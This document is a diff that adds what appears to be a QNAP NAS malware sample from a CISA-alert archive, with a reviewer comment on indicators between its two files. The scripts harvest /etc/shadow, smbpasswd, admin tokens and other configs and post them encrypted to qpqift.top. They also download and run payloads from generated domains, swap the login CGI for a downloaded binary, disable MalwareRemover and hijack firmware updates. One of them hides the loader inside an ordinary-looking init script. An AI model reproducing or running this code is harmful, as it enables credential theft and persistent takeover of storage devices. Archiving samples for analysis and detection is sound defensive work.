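+for dir in '.config' '.liveupdate'; do
+dir="${bdir}/.qpkg/${dir}"
+test -d "$dir" && cd "$dir" && CWD="$dir" && break
+done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then
+grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
+fi
+done
+
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'/CXqrBM2CVbJo'"'"';verifykey="${verifykey}"'"'"'g4rwwSz1Bp1i1'"'/"
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1'"'"
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then
+grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+test -f "$file" && rm "$file" && cp "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file" && test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+done
+file=''
+if find /etc/config/ | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+case "$(uname -m)" in
+*x86_64*)
+arch=x86_64
+binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+;;
+*arm*)
+arch=arm
+binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+;;
+*i*86*)
+arch=i486
+binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+;;
+esac
+
+if [ "x${binhash}" != 'x' ]; then
+curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
+if [ "x${rsynchash}" = "x${binhash}" ]; then
+mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+else
+rm -f '.qdisk_cmd.tmp'
+fi
+fi
+fi
+binhash=''; rsynchash=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+test ! -f "${qpkgdir}/MalwareRemover/modules/${file}" || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" && cat >"${qpkgdir}/MalwareRemover/modules/${file}" <<"EOF"
+#!/bin/sh
+exit 0
+EOF
+chmod +x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJog4rwwSz1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+if [ ! -f "${ts}_c" ]; then
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1547971200_c" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
+case "$(uname -m)" in
+*x86_64*)
+arch=x86_64
+binhash='pt+a/Y3gGOPe9uyBgm85h2eOQV8='
+;;
+*arm*)
+arch=arm
+binhash='W5SbpKsI90NUy4uQg3Pm1agAFho='
+;;
+*i*86*)
+arch=i486
+binhash='TagzVbVf5YhxA3ZXwgBMQKw2zG4='
+;;
+esac
+
+if [ "x${binhash}" != 'x' ]; then
+curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal_${arch}" || rm -f ".qal"
+test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
+if [ "x${rsynchash}" = "x${binhash}" ]; then
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod +x "${cgibindir}"/authLogin.cgi
+fi
+fi
+test -f "1547971200_c" || touch "1547971200_c"
+fi
+
+test ! -f "${cgibindir}"/authLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+
+if [ ! -d rssdoc ]; then
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" || { rm "rssdoc.tar.${compext}" && exit 1; }
+test -f "rssdoc.tar.${compext}" || exit 1
+rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)"
+test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA=" || { rm -f "rssdoc.tar.${compext}"; exit 1; }
+test "$compext" = bz2 && tarflag=j || tarflag=z
+tar -x${tarflag}f "rssdoc.tar.${compext}" || { rm -f rssdoc.tar.{,.${compext}}; exit 1; }
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0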
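Review bot: The sample lands as a bare 212-line script with no analyst note beside it, so the host artefacts a responder would check on a suspect NAS have to be dug out of the code. A short README next to the file could list the ones the visible lines establish: the `0.0.0.0 db.<cc>.clamav.net` and `0.0.0.0 update.nai.com` entries appended to `/etc/hosts`, the `MalwareRemover` Version/Date/Build values forced in `/etc/config/qpkg.conf`, `authLogin.cgi` moved to `sysauthLogin.cgi` under `/home/httpd/cgi-bin`, and the update URLs in `uLinux.conf` rewritten to `http://127.0.0.1:<port>`. It is also worth recording that every transfer to `qpqift.top` uses `curl -k`, so network detection has to key on the hostname or request path rather than on certificate validation, and that `./.qdisk_cmd +i` is applied to the planted files, which presumably sets an immutable attribute that cleanup must clear first. A first-line marker such as `# MALWARE SAMPLE - do not run` would change the file so it no longer matches the SHA-256-style name it is stored under, so the handling warning belongs in the README rather than in the script.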
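--- a/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
+++ b/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
@@ -0,0 +1,510 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+start)
+START_TIME=$(date +"%T")
+echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+do
+# report device info and get cloudinstall agent app download url
+DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+if [ "$NAS_ARCH" == "ARM_64" ]; then
+# create ramdisk and create a 64mb file
+/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+# create block size 1K filesystem
+/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+# create virtual disk
+export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+/bin/mkdir -p $CLOUD_INSTALL_PATH
+# mount virtual disk
+/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+else
+# create and mount tmpfs folder
+/bin/mkdir -p $CLOUD_INSTALL_PATH
+/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+fi
+fi
+cd $CLOUD_INSTALL_PATH
+
+if [[ $DOWNLOAD_URL == https* ]]; then
+REPORT_SUCCESS_TIME=$(date +"%T")
+else
+REPORT_FAIL_TIME=$(date +"%T")
+echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+# stop retry when got bad request
+# prevent put bad request all the time
+if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+break
+fi
+fi
+
+# downlaod cloudinstall agent app
+/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+DOWNLOAD_FINISH_TIME=$(date +"%T")
+# unzip and execute cloudinstallagent
+/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+UNZIP_TIME=$(date +"%T")
+fi
+
+if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+# create folder and create symbolic link
+/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+fi
+
+# wait connect
+sleep 5
+CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+SLEEP_TIME=$(( 30 * $COUNTER ))
+if [ $SLEEP_TIME -gt 300 ]; then
+SLEEP_TIME=300
+fi
+# wait next retry
+sleep $SLEEP_TIME
+fi
+COUNTER=$(( $COUNTER * 2 ))
+done
+
+END_TIME=$(date +"%T")
+echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+# call for a new process group and for later kill
+/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+# set cloudinstall report status
+/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+# add link to report offline
+/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+# buzzer
+HARDWARE_TYPE=$(uname -m)
+if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+then
+/sbin/hal_app --se_buzzer enc_id=0,mode=101
+elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+then
+/sbin/pic_raw 81
+fi
+;;
+
+stop)
+# disconnect cloudinstall agent
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+do
+# use bash kill instead /bin/kill for kill process group
+# cloudinstall agent daemon and inotifywait
+kill -9 -- -$i &>/dev/null
+done
+
+# umount
+if [ "$NAS_ARCH" == "ARM_64" ]; then
+/bin/umount -l $USED_LOOP_DEVICE
+/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+else
+/bin/umount -l $CLOUD_INSTALL_PATH
+fi
+# remove all files
+if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+fi
+if [ -d "$CLOUD_INSTALL_PATH" ]; then
+/bin/rm -rf $CLOUD_INSTALL_PATH
+fi
+if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+fi
+;;
+
+restart)
+$0 stop
+$0 start
+;;
+
+*)
+echo "Usage: $0 {start|stop|restart}"
+{ /share/MD0_DATA/NOPE; exit 1; }
+esac
+{ /share/MD0_DATA/NOPE; exit 0; }
+
+
+set_env()
+{
+debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+if [ "$debug" != "NULL" ]; then
+/bin/touch $LOG_FILE
+else
+/bin/rm -f $LOG_FILE
+fi
+}
+
+set_env
+
+dbg()
+{
+if [ -f "$LOG_FILE" ]; then
+echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr ()
+{
+local s=;
+local min=${1:-4};
+local max=${2:-12};
+local kspace="${3:-a-zA-Z}"
+tr -dc "$kspace" < /dev/urandom | {
+read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+echo "$s"
+}
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='NOPE'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+for ext in $domainexts; do
+hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+for host in $hostnames; do
+test -f "$outfile" && rm -f "$outfile"
+recentupdate=''
+curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+test -s "$outfile" || continue
+fsize=$(( $(wc -c < "$outfile") ))
+test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+test "$rsamsg" || continue
+path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+test "$rsadomain" = "${host}.${ext}" || continue
+timenow=$(date +%s)
+test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+test "$filehash" = "$hash" || continue
+curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+mv "${outfile}_s" "${ts}_v"
+chmod 755 "$outfile" || continue
+( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+test "$recentupdate" -eq 1 && exit 0
+done
+done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+return
+fi
+
+if [ "$QPKG_ENABLE" = "NULL" ]; then
+if [ "$OLD_ENABLE" = "FALSE" ]; then
+dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+fi
+fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+export QNAP_QPKG=rtrr
+else
+export QNAP_QPKG=HybridBackup
+/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+if [ -f /usr/bin/qsyncman ]; then
+[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+/usr/bin/crontab /etc/config/crontab
+echo -n "Starting QSync manitor: "
+[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+echo "OK"
+fi
+}
+
+stop()
+{
+echo "Shutting down QSync monitor: OK"
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+kill $pidnum 2>/dev/null
+i=0
+while [ ${i} -lt 5 ]
+do
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+if [ -z "$pidnum" ]; then
+break
+fi
+sleep 1
+i=`/usr/bin/expr ${i} + 1`
+done
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+#[ "x$_qsyncd_en" = x1 ] || return -1
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+[ -z $_qsyncd_run_pid ] || return -114
+_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+_with_syslog=$1
+if [ "x$_recycle_en" = xTRUE ]; then
+if [ "x$_with_syslog" = x1 ]; then
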